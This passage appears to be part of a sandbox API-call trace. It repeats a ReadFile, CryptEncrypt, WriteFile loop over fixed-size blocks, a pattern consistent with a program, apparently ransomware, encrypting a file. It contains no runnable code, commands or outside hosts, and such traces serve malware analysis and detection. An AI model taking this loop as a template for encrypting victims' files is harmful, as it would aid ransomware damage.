lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.598] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.598] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.598] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.598] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.598] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.598] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.598] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.598] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.599] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.599] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.599] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.599] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.599] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.599] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.599] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.599] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.599] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.599] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.600] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.600] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.600] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.600] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.600] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.600] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.600] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.600] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.600] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.600] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.600] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.600] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.600] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.600] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.600] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.600] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.600] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.600] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.601] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.601] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.601] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.601] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.601] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.601] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.601] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.601] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.601] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.601] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.601] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.601] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.601] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.601] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.601] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.601] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.601] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.601] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.602] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.602] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.602] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.602] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.602] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.602] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.602] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.602] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.602] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.602] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.602] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.602] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.602] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.602] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.602] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.602] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.602] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.602] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.602] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.602] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.603] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.603] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.603] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.603] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.603] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.603] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.603] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.603] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.603] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.603] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.603] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.603] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.603] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.603] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.603] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.603] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.603] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.603] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.604] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.604] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.604] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.604] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.604] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.604] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.604] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.604] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, 